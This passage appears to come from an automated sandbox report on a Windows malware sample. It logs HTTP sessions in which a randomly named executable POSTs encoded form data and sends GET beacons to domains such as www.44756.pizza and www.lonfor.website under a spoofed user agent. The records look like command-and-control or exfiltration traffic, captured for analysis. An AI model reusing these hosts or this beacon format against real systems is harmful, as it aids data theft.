                                                        vary: accept-encoding
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Buo9Afn0U76A6Zt8HZrnf1fFXDb6Rj6Suk5gPTQ4wPA8MRYQKEMfYfWA3dmrQtBCP%2BqzAaNPPwzvkQ5NKun4RBiIg91M95EGDc%2BvbEgD2uCDKNGAsCo5t6rifsiTT1iY2mL"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bb316ec5c9bd-IAD
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7255&min_rtt=7255&rtt_var=3627&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.649994104.21.18.171804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:02.380815029 CET484OUTGET /kxtt/?fVnx=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.grimbo.boats
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:44:03.090744019 CET1101INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:03 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        vary: accept-encoding
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNwb4mw1q2igSdj7r%2BFCdzBhts18GVvcpBQw5avA16vfJBHEkz5ZiRPIFWTnYO0oRF6kw%2FcaUwKLWqjYYHnu6kgogMxcFv%2FDPWhEuRcQrkDZCEfZELH9AYUh2f9eB78G0Zu7"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bb417ee17117-YYZ
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14051&min_rtt=14051&rtt_var=7025&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.649995134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:08.283637047 CET738OUTPOST /a59t/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.44756.pizza
                                                        Origin: http://www.44756.pizza
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.44756.pizza/a59t/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 41 42 2b 77 38 4a 54 49 4a 52 65 69 53 56 57 35 63 6a 70 33 59 58 64 39 58 56 64 2f 46 7a 47 5a 2f 47 59 34 67 65 43 52 42 41 73
                                                        Data Ascii: fVnx=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpAB+w8JTIJReiSVW5cjp3YXd9XVd/FzGZ/GY4geCRBAs
                                                        Jan 16, 2025 00:44:09.139308929 CET312INHTTP/1.1 404 Not Found
                                                        Content-Length: 148
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:44:08 GMT
                                                        Etag: "6743f11f-94"
                                                        Server: nginx
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.649996134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:10.833702087 CET762OUTPOST /a59t/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.44756.pizza
                                                        Origin: http://www.44756.pizza
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.44756.pizza/a59t/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 33 66 39 56 4e 76 2f 6c 7a 73 62 2f 2b 59 71 33 53 6c 65 31 6c 50 63 78 33 37 4b 56 4c 63 79 5a 55 41 37 42 31 35 33 69 45 45 5a 67 3d 3d
                                                        Data Ascii: fVnx=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI3f9VNv/lzsb/+Yq3Sle1lPcx37KVLcyZUA7B153iEEZg==
                                                        Jan 16, 2025 00:44:11.715974092 CET312INHTTP/1.1 404 Not Found
                                                        Content-Length: 148
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:44:11 GMT
                                                        Etag: "6743f11f-94"
                                                        Server: nginx
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.649997134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:13.408778906 CET1775OUTPOST /a59t/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.44756.pizza
                                                        Origin: http://www.44756.pizza
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.44756.pizza/a59t/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 52 64 6c 51 42 55 78 38 76 67 2b 5a 54 74 6b 56 67 4d 2b 44 48 54 58 38 33 6e 6d 51 79 53 65 58 39 55 5a 58 44 2b 43 7a 33 52 78 70 35 74 30 30 38 41 6a 51 5a 2f 4e 73 62 56 73 4f 53 62 44 4a 73 6d 2b 45 56 56 30 50 73 35 76 2b 61 52 45 63 36 6b 6a 55 49 55 33 52 68 49 2f 67 53 47 70 32 54 74 59 2f 36 6e 42 2f 30 42 71 55 50 62 47 70 75 37 6c 46 66 38 57 2f 48 4a 5a 71 67 55 59 74 6b 4d 34 35 6f 76 75 52 6b 73 65 56 78 33 6d 76 47 31 4b 31 68 31 4b 52 54 42 41 75 49 70 5a 32 43 6a 66 [TRUNCATED]
                                                        Data Ascii: fVnx=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7RdlQBUx8vg+ZTtkVgM+DHTX83nmQySeX9UZXD+Cz3Rxp5t008AjQZ/NsbVsOSbDJsm+EVV0Ps5v+aREc6kjUIU3RhI/gSGp2TtY/6nB/0BqUPbGpu7lFf8W/HJZqgUYtkM45ovuRkseVx3mvG1K1h1KRTBAuIpZ2CjfTsh1Y9GqXOBdmuJQAnbrHDdPzTcNlkp1iyEEcsqavMKh3TZj9w3aUyCuzGtmQbPSrdQug+E6+pL8orrFFNhj7SjjSdn2b8Ot2zg7LtLP7o8T+WbR2tt2V4OE/enr8zLfeSdheXwJZorjy5mNaqg72KeT4vXl5p4Xkx2nFnbnp2fmZo7fqt7e7MDLZ8WMSsLlE87vpxqO8g46QF0XJgy7RyRrb9y4kA8Mlc3u6X7GrJp13JkQGWnxkngAyBARzhY637HBMS3LkNg79beyWyw+C1CefkL57T5UxOes5+oLYtcQo0Z3MuWYi2dLTuE57xd39Y1uE81bjX3xkCvZk37prwYMf1sX19m+oPbKn7j8r6uDA9VIAjEGgqbVeKOJCZ81X5dk9iYBxLK7VLtUdf+KZtFxNbdZXCcNQnLVcJb1pSGB8zVV7124+qXYcbqY6lcf+jYQgSHGjfq9cOMHgBdlv/lS+Drd2vZOpXzm77c/6YZiIu4u8IaNu0PC2nBOiLLBXgKD+Tx12/CwLXVsCSWLoBmRdZqpX4LW2WHqNZL5/6QzlN5VvRh8aaUSFpt3QezxRtxbq43hNHqEnL2dVzDDc1z62A2dg69126aLA4+2Z/mvlQvdkM9BCK8TbjaPlvULNtNnpsildfhmFuNnnvTUpq6JITqoblUgTj [TRUNCATED]
                                                        Jan 16, 2025 00:44:14.291996002 CET312INHTTP/1.1 404 Not Found
                                                        Content-Length: 148
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:44:14 GMT
                                                        Etag: "6743f11f-94"
                                                        Server: nginx
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.649998134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:16.028974056 CET483OUTGET /a59t/?fVnx=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.44756.pizza
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:44:16.853264093 CET312INHTTP/1.1 404 Not Found
                                                        Content-Length: 148
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:44:16 GMT
                                                        Etag: "6743f11f-94"
                                                        Server: nginx
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.650000199.192.21.169804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:21.906467915 CET747OUTPOST /bowc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.lonfor.website
                                                        Origin: http://www.lonfor.website
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.lonfor.website/bowc/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 6f 44 38 52 33 6e 59 4a 79 52 42 61 66 66 65 7a 43 33 41 6d 4c 48 6c 31 6c 39 56 62 51 61 72 48 6d 52 4e 55 59 45 78 32 7a 57 4d
                                                        Data Ascii: fVnx=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOoD8R3nYJyRBaffezC3AmLHl1l9VbQarHmRNUYEx2zWM
                                                        Jan 16, 2025 00:44:22.500412941 CET918INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:22 GMT
                                                        Server: Apache
                                                        Content-Length: 774
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.650001199.192.21.169804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:24.464865923 CET771OUTPOST /bowc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.lonfor.website
                                                        Origin: http://www.lonfor.website
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.lonfor.website/bowc/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6e 6e 31 6e 6c 6e 62 77 61 42 46 6d 70 4e 47 50 49 57 35 48 7a 76 4f 2f 55 72 66 62 79 68 47 58 35 45 57 2f 68 50 30 34 55 6f 56 51 3d 3d
                                                        Data Ascii: fVnx=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bnn1nlnbwaBFmpNGPIW5HzvO/UrfbyhGX5EW/hP04UoVQ==
                                                        Jan 16, 2025 00:44:25.062517881 CET918INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:24 GMT
                                                        Server: Apache
                                                        Content-Length: 774
                                                        Connection: close
                                                        Content-Type: text/html
